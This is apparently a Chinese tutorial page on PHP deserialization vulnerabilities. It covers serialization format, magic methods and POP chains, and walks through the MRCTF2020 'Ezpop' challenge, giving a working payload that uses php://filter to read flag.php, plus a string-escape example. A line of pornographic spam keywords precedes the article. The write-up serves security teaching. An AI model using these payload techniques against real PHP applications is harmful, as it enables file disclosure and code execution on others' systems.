欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

PHP反序列化漏洞實(shí)例深入解析

 更新時(shí)間:2022年10月10日 10:48:09   作者:XINO  
這篇文章主要為大家介紹了PHP反序列化漏洞實(shí)例深入解析,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪

引文

上一篇給大家?guī)砹薠SS跨站腳本攻擊漏洞不知道大家學(xué)的咋樣了,今天給大家?guī)砹硪粋€(gè)漏洞,PHP的反序列化漏洞,這也是我在CTF比賽中遇到過最多的也是比較考察邏輯思維的一種漏洞。

簡(jiǎn)介

PHP反序列化是一個(gè)非常常見的漏洞,利用難度相比于文件上傳等漏洞相對(duì)較困難,漏洞的形成的根本原因是程序沒有對(duì)用戶輸入的反序列化字符串進(jìn)行檢測(cè),導(dǎo)致反序列化過程可以被惡意控制,進(jìn)而造成代碼執(zhí)行、getshell等一系列不可控的后果。

基礎(chǔ)知識(shí)

在了解反序列化之前先看看反序列化與序列化:

序列化

序列化就是將 對(duì)象object、string、array、變量 轉(zhuǎn)換成具有一定格式的字符串,方便保持穩(wěn)定的格式在文件中傳輸,以便還原為原來的內(nèi)容。這個(gè)應(yīng)該很好理解,學(xué)過JAVA反序列化的可以按照J(rèn)AVA的去理解,只不過用到的函數(shù)不一樣罷了,下面是一個(gè)序列化的例子:

<?php
class XINO{
    var $test = '123456';
}
$class1 = new XINO;
$class1_ser = serialize($class1);
print_r($class1_ser);
?>

輸出字符串:

O:4:"XINO":1:{s:4:"test";s:6:"123456";}

O代表存儲(chǔ)的是對(duì)象(object),4表示有4個(gè)字符,XINO表示對(duì)象名,1表示有一個(gè)值,括號(hào)里的以此類推。

反序列化

與序列化相對(duì)應(yīng),從序列化后的結(jié)果中恢復(fù)對(duì)象(object)。用法和上面的序列化函數(shù)差不多,只是作用相反,會(huì)恢復(fù)被序列化的字符串流。函數(shù)為:unserialize。

屬性

了解完序列化與反序列化,下一個(gè)要了解的我認(rèn)為是php的屬性,有基礎(chǔ)的小伙伴可能會(huì)知道php的屬性有:public(公有),protected(受保護(hù))或 private(私有)。

由于變量的屬性不同,序列化后的結(jié)果也會(huì)有一些細(xì)微的差異,這是要十分記住的點(diǎn),也是個(gè)人在學(xué)習(xí)中經(jīng)常出錯(cuò)的點(diǎn):

public:屬性被序列化的時(shí)候?qū)傩灾挡粫?huì)更改。

protected:屬性被序列化的時(shí)候?qū)傩灾禃?huì)變成 %00*%00屬性名

private:屬性被序列化的時(shí)候?qū)傩灾禃?huì)變成%00類名%00屬性名

上面這些要牢牢記住,有時(shí)候反序列化攻擊不成功也許并不是反序列化利用鏈不對(duì),而是這些細(xì)微的點(diǎn)出錯(cuò)了。

魔術(shù)方法

所謂魔術(shù)方法,個(gè)人理解的是當(dāng)達(dá)成某個(gè)特定條件時(shí)會(huì)自動(dòng)調(diào)用的方法,而在php反序列化中,常用的魔術(shù)方法與觸發(fā)條件如下:

__construct   當(dāng)一個(gè)對(duì)象創(chuàng)建時(shí)被調(diào)用,
__destruct   當(dāng)一個(gè)對(duì)象銷毀時(shí)被調(diào)用,
__toString   當(dāng)一個(gè)對(duì)象被當(dāng)作一個(gè)字符串被調(diào)用。
__wakeup()   使用unserialize時(shí)觸發(fā)
__sleep()    使用serialize時(shí)觸發(fā)
__destruct()    對(duì)象被銷毀時(shí)觸發(fā)
__call()    在對(duì)象上下文中調(diào)用不可訪問的方法時(shí)觸發(fā)
__callStatic()    在靜態(tài)上下文中調(diào)用不可訪問的方法時(shí)觸發(fā)
__get()    用于從不可訪問的屬性讀取數(shù)據(jù)
__set()    用于將數(shù)據(jù)寫入不可訪問的屬性
__isset()    在不可訪問的屬性上調(diào)用isset()或empty()觸發(fā)
__unset()     在不可訪問的屬性上使用unset()時(shí)觸發(fā)
__toString()    把類當(dāng)作字符串使用時(shí)觸發(fā),返回值需要為字符串
__invoke()   當(dāng)腳本嘗試將對(duì)象調(diào)用為函數(shù)時(shí)觸發(fā)

比如下面代碼:

<?php class TestClass {
public $foo;
public function __construct($foo) {
$this->foo = $foo; 
} 
public function __toString() {
return $this->foo; 
} 
} 
$class = new TestClass('Hello');
echo $class; // 運(yùn)行結(jié)果:Hello ?>

我們新定義一個(gè)了一個(gè)TestClass類,由于一個(gè)新對(duì)象被創(chuàng)建,觸發(fā)__construct,echo該類時(shí),對(duì)象被當(dāng)作了字符串調(diào)用,于是觸發(fā)__toStrng()方法,最后輸出Hello。

POP鏈

學(xué)完上面的基礎(chǔ)知識(shí)后,我們可以引入POP鏈的知識(shí)了,當(dāng)注入點(diǎn)存在普通的類方法中,我們就不能調(diào)用方法了,所以我們需要找到普通類與魔術(shù)方法之間的聯(lián)系,也就是構(gòu)造POP鏈,理出一種邏輯思路,通過這種邏輯思路來構(gòu)造一條pop鏈,從而達(dá)到攻擊的目的。

下面給大家?guī)硪粋€(gè)簡(jiǎn)單的例子:

[MRCTF2020]Ezpop

打開靶機(jī)發(fā)現(xiàn)網(wǎng)站源碼:

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|../i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

這是一道比較經(jīng)典的POP鏈題目,可以正著推或者反著推,本次我們反著推,我們一步一步分析:

Modifier類

class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }

可以看到有利用點(diǎn)include來進(jìn)行文件包含,php偽協(xié)議來訪問flag.php。而要想觸發(fā)append函數(shù), _invoke函數(shù)被調(diào)用時(shí)會(huì)觸發(fā)include函數(shù)。

我們看TEST類,類中有 _get() 魔術(shù)方法,將this->p設(shè)為一個(gè)構(gòu)造好的Modifier對(duì)象。再看看show類,其中有toString魔術(shù)方法,在一個(gè)對(duì)象被當(dāng)作一個(gè)字符串使用時(shí)調(diào)用,當(dāng)echo一個(gè)對(duì)象時(shí)會(huì)自動(dòng)觸發(fā)這個(gè)方法。返回了 $this->str->source,最后的一步是讓source 等于對(duì)象,進(jìn)而觸發(fā) __toString方法。

最后的構(gòu)造的POP鏈payload為:

<?php
class Modifier {
	protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
    public $source;
    public $str;
    public function __construct(){
        $this->str = new Test();
    }
}
class Test{
    public $p;
}
$a = new Show();
$a->source = new Show();
$a->source->str->p = new Modifier();
echo urlencode(serialize($a));
?>

運(yùn)行一下得到結(jié)果:

提交就可以得到結(jié)果。

PHP字符串逃逸

學(xué)完P(guān)OP鏈,我們進(jìn)階講一下PHP字符串逃逸,這也是有一些難度的知識(shí)點(diǎn),可以先簡(jiǎn)單理解為SQL注入,這里就簡(jiǎn)單講講:反序列化以;}為結(jié)束標(biāo)志,后面的內(nèi)容則忽略不管。假設(shè)我們構(gòu)造一個(gè)序列化字符串

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

如果題目中,將flag過濾,我們的字符串會(huì)變成:

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

flag被替換為空了,字符長(zhǎng)度不匹配就會(huì)向后讀取,因?yàn)槲覀円獦?gòu)造惡意字符串去匹配。從而達(dá)到逃逸。

結(jié)語

今天比較詳細(xì)的講了PHP反序列化漏洞的原理以及應(yīng)用方法,有興趣的小伙伴可以自己去搭建靶機(jī)來進(jìn)行測(cè)試,以上就是PHP反序列化漏洞實(shí)例深入解析的詳細(xì)內(nèi)容,更多關(guān)于PHP反序列化漏洞的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

最新評(píng)論